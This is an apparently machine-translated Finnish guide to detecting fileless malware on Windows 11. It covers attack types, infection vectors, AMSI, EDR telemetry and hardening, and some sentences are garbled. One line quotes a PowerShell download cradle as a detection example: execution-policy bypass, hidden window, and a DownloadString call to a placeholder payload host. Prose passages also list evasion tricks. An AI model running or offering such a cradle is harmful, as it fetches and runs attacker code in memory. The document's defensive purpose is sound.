Kuinka havaita vaarallisia tiedostottomia haittaohjelmia Windows 11:ssä

¿Miten havaitaan vaarallinen tiedostoton haittaohjelma? Tiedostottomia hyökkäyksiä on esiintynyt merkittävästi, ja mikä pahinta, Windows 11 ei ole immuuniTämä lähestymistapa ohittaa levyn ja luottaa muistiin ja laillisiin järjestelmätyökaluihin; siksi allekirjoituspohjaiset virustorjuntaohjelmat kamppailevat. Jos etsit luotettavaa tapaa havaita se, vastaus piilee yhdistämällä telemetria, käyttäytymisanalyysi ja Windows-komponentit.

Nykyisessä ekosysteemissä PowerShelliä, WMI:tä tai Mshtaa väärinkäyttävät kampanjat esiintyvät rinnakkain kehittyneempien tekniikoiden, kuten muistin injektoinnin, levyn "koskematta" tapahtuvan pysyvyyden ja jopa ... laiteohjelmiston väärinkäytöksetOlennaista on ymmärtää uhkakartta, hyökkäysvaiheet ja mitä signaaleja ne jättävät, vaikka kaikki tapahtuisi RAM-muistissa.

Mikä on tiedostoton haittaohjelma ja miksi se on huolenaihe Windows 11:ssä?

Kun puhumme "tiedostottomista" uhkista, viittaamme haitalliseen koodiin, joka Sinun ei tarvitse tallettaa uusia suoritettavia tiedostoja tiedostojärjestelmässä toimiakseen. Se yleensä ruiskutetaan käynnissä oleviin prosesseihin ja suoritetaan RAM-muistissa Microsoftin allekirjoittamien tulkkien ja binäärien avulla (esim. PowerShell, WMI, rundll32, mshtaTämä pienentää jalanjälkeäsi ja antaa sinun ohittaa hakukoneet, jotka etsivät vain epäilyttäviä tiedostoja.

Jopa toimistoasiakirjat tai PDF-tiedostot, jotka hyödyntävät haavoittuvuuksia komentojen käynnistämiseen, katsotaan osaksi ilmiötä, koska aktivoi suoritus muistissa jättämättä hyödyllisiä binääritiedostoja analyysia varten. makrot ja DDE Officessa, koska koodi suoritetaan laillisissa prosesseissa, kuten WinWordissa.

Hyökkääjät yhdistävät sosiaalista manipulointia (tietojenkalastelu, roskapostilinkit) teknisiin ansoihin: käyttäjän napsautus käynnistää ketjun, jossa komentosarja lataa ja suorittaa muistissa olevan viimeisen hyötykuorman, välttäen jälkien jättämistä levyllä. Tavoitteet vaihtelevat tietovarkauksista kiristysohjelmien suorittamiseen ja äänettömään sivuttaisliikkeeseen.

Typologiat järjestelmän jalanjäljen mukaan: 'puhtaista' hybrideihin

Sekavien käsitteiden välttämiseksi on hyödyllistä erotella uhat niiden tiedostojärjestelmän kanssa tapahtuvan vuorovaikutuksen asteen mukaan. Tämä luokittelu selventää mikä säilyy, missä koodi elää ja mitä merkkejä se jättää?.

Tyyppi I: ei tiedostotoimintaa

Täysin tiedostoton haittaohjelma ei kirjoita mitään levylle. Klassinen esimerkki on hyökkäyksen hyödyntäminen verkon haavoittuvuus (kuten EternalBlue-vektori aikoinaan) toteuttaakseen ytimen muistissa sijaitsevan takaportin (kuten DoublePulsarissa). Tässä kaikki tapahtuu RAM-muistissa, eikä tiedostojärjestelmässä ole artefakteja.

Toinen vaihtoehto on saastuttaa firmware komponenteista: BIOS/UEFI, verkkosovittimet, USB-oheislaitteet (BadUSB-tyyppiset tekniikat) tai jopa suorittimen alijärjestelmät. Ne säilyvät uudelleenkäynnistysten ja uudelleenasennusten jälkeen, ja niihin liittyy lisähaasteita, jotka johtuvat siitä, että Harvat tuotteet tarkastavat laiteohjelmistonNämä ovat monimutkaisia ​​hyökkäyksiä, harvempia, mutta vaarallisia niiden hiiviskelyn ja kestävyyden vuoksi.

Tyyppi II: Epäsuora arkistointitoiminta

Tässä haittaohjelma ei "jätä" omaa suoritettavaa tiedostoa, vaan käyttää järjestelmän hallinnoimia säilöjä, jotka on tallennettu olennaisesti tiedostoina. Esimerkiksi takaportteja, jotka istuttavat powershell-komennot WMI-arkistoon ja käynnistää sen suorittamisen tapahtumasuodattimilla. Sen voi asentaa komentoriviltä poistamatta binääritiedostoja, mutta WMI-arkisto sijaitsee levyllä laillisena tietokantana, mikä vaikeuttaa sen puhdistamista järjestelmään vaikuttamatta.

Käytännön näkökulmasta niitä pidetään tiedostottomina, koska kyseinen säilö (WMI, rekisteri jne.) Se ei ole klassinen havaittava suoritettava tiedosto Ja sen puhdistaminen ei ole triviaalia. Tulos: huomaamaton pysyvyys, jossa on vain vähän "perinteisiä" jälkiä.

Tyyppi III: Vaatii toimiakseen tiedostoja

Joissakin tapauksissa ylläpidetään 'tiedostoton' pysyvyys Loogisella tasolla ne tarvitsevat tiedostopohjaisen laukaisimeen perustuvan toiminnon. Tyypillinen esimerkki on Kovter: se rekisteröi komentotulkkiverbin satunnaiselle tiedostopäätteelle; kun kyseisellä tiedostopäätteellä varustettu tiedosto avataan, käynnistyy pieni mshta.exe-komentosarja, joka rekonstruoi haitallisen merkkijonon rekisteristä.

Temppu on siinä, että nämä satunnaisilla tiedostopäätteillä varustetut "syötti"-tiedostot eivät sisällä analysoitavaa hyötykuormaa, ja suurin osa koodista sijaitsee rekisteröinti (toinen säilö). Siksi ne luokitellaan vaikutukseltaan tiedostottomiksi, vaikka ne tarkkaan ottaen ovat riippuvaisia ​​yhdestä tai useammasta levyllä olevasta artefakteista laukaisimena.

Tartunnanlevittäjät ja "isännät": minne se pääsee ja minne se piiloutuu

Havaitsemisen parantamiseksi on tärkeää kartoittaa tartunnan sisäänpääsykohta ja isäntä. Tämä näkökulma auttaa suunnittelussa erityisiä säätimiä Priorisoi asianmukaista telemetriaa.

hyödyntää

• Tiedostopohjainen (Tyyppi III): Dokumentit, suoritettavat tiedostot, vanhat Flash/Java-tiedostot tai LNK-tiedostot voivat hyödyntää selainta tai niitä käsittelevää moottoria ladatakseen komentokoodia muistiin. Ensimmäinen vektori on tiedosto, mutta hyötykuorma siirtyy RAM-muistiin.
• Verkkopohjainen (Tyyppi I): ​​Haavoittuvuutta (esim. SMB:ssä) hyödyntävä paketti suoritetaan käyttäjäalueella tai ytimessä. WannaCry teki tästä lähestymistavasta suositun. Suora muistin lataus ilman uutta tiedostoa.

Palvelimet

• laitteet (Tyyppi I): ​​Levyn tai verkkokortin laiteohjelmistoa voidaan muuttaa ja koodia lisätä. Vaikea tarkastaa ja säilyy käyttöjärjestelmän ulkopuolella.
• CPU ja hallintajärjestelmät (Tyyppi I): ​​Teknologiat, kuten Intelin ME/AMT, ovat osoittaneet polkuja Verkkoutuminen ja toteutus käyttöjärjestelmän ulkopuolellaSe hyökkää hyvin matalalla tasolla ja sillä on korkea hiiviskelypotentiaali.
• USB (Tyyppi I): ​​BadUSB:n avulla voit ohjelmoida USB-aseman uudelleen matkimaan näppäimistöä tai verkkokorttia ja käynnistämään komentoja tai ohjaamaan liikennettä uudelleen.
• BIOS / UEFI (Tyyppi I): ​​haitallinen laiteohjelmiston uudelleenohjelmointi (kuten Mebromi), joka suoritetaan ennen Windowsin käynnistymistä.
• Hypervisor (Tyyppi I): ​​Käyttöjärjestelmän alle toteutettu mini-hypervisor sen läsnäolon peittämiseksi. Harvinainen, mutta jo havaittu hypervisor-rootkittien muodossa.

Suoritus ja injektio

• Tiedostopohjainen (Tyyppi III): EXE/DLL/LNK tai ajoitetut tehtävät, jotka käynnistävät pistoksia laillisiin prosesseihin.
• Makrot (Tyyppi III): Officen VBA voi dekoodata ja suorittaa hyötykuormia, mukaan lukien täydellisiä kiristysohjelmia, käyttäjän suostumuksella petoksen avulla.
• Skriptit (Tyyppi II): PowerShell, VBScript tai JScript tiedostosta, komentoriviltä, palvelut, rekisteröinti tai WMIHyökkääjä voi kirjoittaa skriptin etäyhteyden aikana koskematta levyyn.
• Käynnistystietue (MBR/Boot) (Tyyppi II): Perheet, kuten Petya, korvaavat käynnistyssektorin ottaakseen hallinnan käynnistyksen yhteydessä. Se on tiedostojärjestelmän ulkopuolella, mutta käyttöjärjestelmällä ja nykyaikaisilla ratkaisuilla on siihen pääsy, jotka voivat palauttaa sen.

Tiedostottomien hyökkäysten toimintaperiaate: vaiheet ja signaalit

Vaikka kampanjat eivät jätä suoritettavia tiedostoja, ne noudattavat vaiheittaista logiikkaa. Niiden ymmärtäminen mahdollistaa seurannan. tapahtumat ja prosessien väliset suhteet jotka jättävät jäljen.

• Ensimmäinen käyttöoikeusTietojenkalasteluhyökkäykset linkkien tai liitteiden, vaarantuneiden verkkosivustojen tai varastettujen tunnistetietojen avulla. Monet ketjut alkavat Office-dokumentilla, joka käynnistää komennon. PowerShell.
• Sitkeys: takaportit WMI:n kautta (suodattimet ja tilaukset), Rekisterin suoritusavaimet tai ajoitettuja tehtäviä, jotka käynnistävät skriptejä uudelleen ilman uutta haitallista tiedostoa.
• EksfiltraatioKun tiedot on kerätty, ne lähetetään verkosta ulos luotettujen prosessien (selaimet, PowerShell, bitsadmin) avulla liikenteen sekoittamiseksi.

Tämä kaava on erityisen salakavala, koska hyökkäysindikaattorit Ne piileskelevät normaaliuden taakse: komentoriviargumentit, prosessien ketjutus, poikkeavat lähtevät yhteydet tai pääsy injektio-API-rajapintoihin.

Yleisiä tekniikoita: muistista tallentamiseen

Näyttelijät luottavat moniin eri lähteisiin menetelmiä jotka optimoivat piilotuksen. On hyödyllistä tietää yleisimmät tehokkaan tunnistuksen aktivoimiseksi.

• Muistoissa eläväHyötykuormien lataaminen luotettavan prosessin tilaan, joka odottaa aktivointia. rootkitit ja koukut Ytimessä ne nostavat kätkemisen tasoa.
• Pysyvyys rekisterissäTallenna salatut blobit avaimiin ja kostuta ne uudelleen laillisesta käynnistysohjelmasta (mshta, rundll32, wscript). Lyhytaikainen asennusohjelma voi tuhota itsensä minimoidakseen jalanjälkensä.
• Tunnistetietojen kalasteluHyökkääjä suorittaa varastettuja käyttäjätunnuksia ja salasanoja käyttäen etäkuoria ja istuttaa äänetön pääsy rekisterissä tai WMI:ssä.
• Tiedostoton kiristysohjelmaSalaus ja C2-viestintä ohjataan RAM-muistista, mikä vähentää havaitsemismahdollisuuksia ennen kuin vauriot ovat näkyvissä.
• Käyttöpakkaukset: automatisoidut ketjut, jotka havaitsevat haavoittuvuuksia ja ottavat käyttöön vain muistia käyttäviä hyötykuormia käyttäjän napsauttamisen jälkeen.
• Koodin sisältävät asiakirjatmakrot ja mekanismit, kuten DDE, jotka käynnistävät komentoja tallentamatta suoritettavia tiedostoja levylle.

Alan tutkimukset ovat jo osoittaneet huomattavia piikkejä: yhdellä jaksolla vuonna 2018 yli 90 prosentin kasvu skriptipohjaisissa ja PowerShell-ketjuhyökkäyksissä merkki siitä, että vektoria suositaan sen tehokkuuden vuoksi.

Haaste yrityksille ja toimittajille: miksi pelkkä estäminen ei riitä

Olisi houkuttelevaa poistaa PowerShell käytöstä tai estää makrot pysyvästi, mutta Rikoisit operaationPowerShell on modernin hallinnon tukipilari ja Office on välttämätön liiketoiminnassa; sokea estäminen ei usein ole mahdollista.

Lisäksi on olemassa tapoja ohittaa peruskontrollit: PowerShellin suorittaminen DLL-tiedostojen ja rundll32:n kautta, komentosarjojen pakkaaminen EXE-tiedostoiksi, Tuo oma PowerShell-kopiosi tai jopa piilottaa skriptejä kuviin ja poimia ne muistiin. Siksi puolustusta ei voida perustaa pelkästään työkalujen olemassaolon kiistämiseen.

Toinen yleinen virhe on delegoida koko päätös pilvelle: jos agentin on odotettava vastausta palvelimelta, Menetät reaaliaikaisen ehkäisynTelemetriatietoja voidaan ladata tiedon rikastamiseksi, mutta Lieventämisen on tapahduttava päätepisteessä.

Tiedostottoman haittaohjelman havaitseminen Windows 11:ssä: telemetria ja käyttäytyminen

Voittava strategia on valvoa prosesseja ja muistiaEi tiedostoja. Haitalliset toimintamallit ovat vakaampia kuin tiedostojen muodot, joten ne sopivat erinomaisesti ennaltaehkäiseviin moottoreihin.

• AMSI (haittaohjelmien torjuntatarkistusliittymä)Se sieppaa PowerShell-, VBScript- tai JScript-skriptejä, vaikka ne olisi dynaamisesti rakennettu muistiin. Erinomainen tapa tallentaa hämärrettyjä merkkijonoja ennen niiden suorittamista.
• Prosessien seurantaLähtö/maali, PID, vanhemmat ja lapset, reitit, komentorivit ja tiivisteitä sekä suorituspuita koko tarinan ymmärtämiseksi.
• Muistianalyysi: injektioiden, heijastavien tai PE-kuormien havaitseminen koskematta levyyn ja epätavallisten suoritettavien alueiden tarkastelu.
• Käynnistinsektorin suojaus: MBR/EFI:n hallinta ja palauttaminen peukaloinnin sattuessa.

Microsoftin ekosysteemissä Defender for Endpoint yhdistää AMSI:n, käyttäytymisen seurantaMuistin skannausta ja pilvipohjaista koneoppimista käytetään skaalaamaan havaintoja uusien tai hämärrettyjen varianttien variaatioiden varalta. Muut toimittajat käyttävät samanlaisia ​​lähestymistapoja ytimen sisäisten moottorien kanssa.

Realistinen esimerkki korrelaatiosta: dokumentista PowerShelliin

Kuvittele ketju, jossa Outlook lataa liitteen, Word avaa dokumentin, aktiivinen sisältö otetaan käyttöön ja PowerShell käynnistetään epäilyttävillä parametreilla. Oikea telemetria näyttäisi... Komentorivi (esim. ExecutionPolicy-ohitus, piilotettu ikkuna), yhteyden muodostaminen epäluotettavaan toimialueeseen ja aliprosessin luominen, joka asentaa itsensä AppDataan.

Paikallisessa kontekstissa oleva agentti pystyy pysäytä ja peruuta haitallista toimintaa ilman manuaalista puuttumista asiaan, SIEM-järjestelmään ilmoittamisen tai sähköpostin/tekstiviestin lisäksi. Joissakin tuotteissa on lisätty perussyyanalyysi (StoryLine-tyyppiset mallit), joka ei viittaa näkyvään prosessiin (Outlook/Word), vaan täysin haitallinen ketju ja sen alkuperä järjestelmän kattavaksi puhdistamiseksi.

Tyypillinen komentokuvio, johon kannattaa kiinnittää huomiota, voisi näyttää tältä: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logiikka ei ole tarkka merkkijono, mutta signaalien joukko: käytännön ohitus, piilotettu ikkuna, selkeä lataus ja muistissa suoritettava suoritus.

AMSI, prosessi ja kunkin toimijan rooli: päätepisteestä SOC:iin

Skriptien tallennuksen lisäksi vankka arkkitehtuuri järjestää vaiheita, jotka helpottavat tutkimista ja reagointia. Mitä enemmän todisteita on ennen kuorman suorittamista, sitä parempi., paras.

• Skriptin sieppausAMSI toimittaa sisällön (vaikka se luotaisiin lennossa) staattista ja dynaamista analyysia varten haittaohjelmaputkessa.
• ProsessitapahtumatPID:t, binäärit, tiivisteet, reitit ja muut tiedot kerätään. argumentit, luoden prosessipuut, jotka johtivat lopulliseen kuormaan.
• Havaitseminen ja raportointiHavainnot näytetään tuotekonsolissa ja välitetään verkkoalustoille (NDR) kampanjan visualisointia varten.
• KäyttäjätakuutVaikka skripti injektoidaan muistiin, kehys AMSI sieppaa sen yhteensopivissa Windows-versioissa.
• Järjestelmänvalvojan oikeudet: käytäntömääritykset komentosarjojen tarkastuksen mahdollistamiseksi, käyttäytymiseen perustuva esto ja raporttien luominen konsolista.
• SOC-työ: artefaktien poiminta (virtuaalikoneen UUID, käyttöjärjestelmän versio, komentosarjan tyyppi, aloittajaprosessi ja sen pääprosessi, tiivisteet ja komentorivit) historian uudelleenluomiseksi ja hissisäännöt tulevaisuudessa.

Kun alusta sallii viennin muistipuskuri Toteutuksen yhteydessä tutkijat voivat luoda uusia havaintoja ja rikastuttaa puolustusta samankaltaisia ​​variantteja vastaan.

Käytännön toimenpiteet Windows 11:ssä: ehkäisy ja metsästys

Muistin tarkastuksen ja AMSI:n lisäksi Windows 11:ssä on EDR, jonka avulla voit sulkea hyökkäysalueita ja parantaa näkyvyyttä seuraavilla tavoilla: natiivit ohjausobjektit.

• Rekisteröinti ja rajoitukset PowerShellissäMahdollistaa komentosarjojen lohkojen ja moduulien lokikirjauksen, käyttää rajoitettuja tiloja mahdollisuuksien mukaan ja hallitsee käyttöä Ohitus/Piilotettu.
• Hyökkäyspinnan vähentämissäännöt (ASR): estää Office-prosessien ja komentosarjojen käynnistykset WMI-väärinkäyttö/PSExec, kun sitä ei tarvita.
• Office-makrokäytännöt: poistaa oletuksena käytöstä sisäisen makroallekirjoituksen ja tiukat luottamusluettelot; valvoo vanhoja DDE-työnkulkuja.
• WMI-tarkastus ja -rekisteri: valvoo tapahtumatilauksia ja automaattisen suorituksen avaimia (Run, RunOnce, Winlogon) sekä tehtävien luomista ajoitettu.
• Käynnistyssuoja: aktivoi Secure Bootin, tarkistaa MBR/EFI-eheyden ja varmistaa, ettei käynnistyksen yhteydessä ole muutoksia.
• Paikkaus ja kovettuminen: sulkee hyödynnettävissä olevia haavoittuvuuksia selaimissa, Office-komponenteissa ja verkkopalveluissa.
• tietoisuuskouluttaa käyttäjiä ja teknisiä tiimejä tietojenkalastelussa ja hyökkäysten signaaleissa salaiset teloitukset.

Etsinnässä keskitytään kyselyihin, jotka koskevat seuraavia aiheita: prosessien luominen Officen avulla PowerShell/MSHTA:n suuntaan, argumentit, joissa on latausmerkkijono/lataustiedostoSkriptit, joissa on selkeä obfuskaatio, heijastavat injektiot ja lähtevät verkot epäilyttäviin ylätason verkkoihin. Vertaile näitä signaaleja maineen ja taajuuden kanssa kohinan vähentämiseksi.

Mitä kukin moottori pystyy havaitsemaan nykyään?

Microsoftin yritysratkaisut yhdistävät AMSI:n, käyttäytymisanalytiikan, tutkia muistia ja käynnistyssektorin suojaus sekä pilvipohjaiset koneoppimismallit skaalautumaan uusia uhkia vastaan. Muut toimittajat toteuttavat ydintason valvontaa erottaakseen haitalliset ohjelmistot vaarattomista ohjelmistoista automaattisella muutosten peruutuksella.

Lähestymistapa, joka perustuu teloitustarinoita Sen avulla voit tunnistaa perimmäisen syyn (esimerkiksi Outlook-liitetiedoston, joka laukaisee ketjun) ja lieventää koko puun vaikutusta: skriptejä, avaimia, tehtäviä ja välibinäärejä, välttäen jumiutumisen näkyvään oireeseen.

Yleisimmät virheet ja niiden välttäminen

PowerShellin estäminen ilman vaihtoehtoista hallintasuunnitelmaa ei ole vain epäkäytännöllistä, vaan siihen liittyy myös tapoja vedota siihen epäsuorastiSama pätee makroihin: joko hallitset niitä käytännöillä ja allekirjoituksilla, tai liiketoiminta kärsii. On parempi keskittyä telemetriaan ja käyttäytymissääntöihin.

Toinen yleinen virhe on uskoa, että sovellusten valkolistaus ratkaisee kaiken: tiedostoton teknologia perustuu juuri tähän. luotetut sovelluksetKontrollin tulisi tarkkailla, mitä he tekevät ja miten he suhtautuvat toisiinsa, ei vain sitä, onko heillä lupaa.

Kaiken edellä mainitun ansiosta tiedostoton haittaohjelma lakkaa olemasta "haamu", kun seuraat sitä, millä on todella merkitystä: käyttäytyminen, muisti ja alkuperä jokaisesta suorituksesta. Yhdistämällä AMSI:n, monipuolisen prosessitelemetrian, natiivit Windows 11 -ohjausobjektit ja EDR-kerroksen käyttäytymisanalyysin kanssa saat etulyöntiaseman. Lisää tähän realistiset makro- ja PowerShell-käytännöt, WMI/rekisterin auditointi ja komentorivien ja prosessipuiden priorisointiin perustuva metsästys, saat puolustusjärjestelmän, joka katkaisee nämä ketjut ennen kuin ne edes ääntelevät.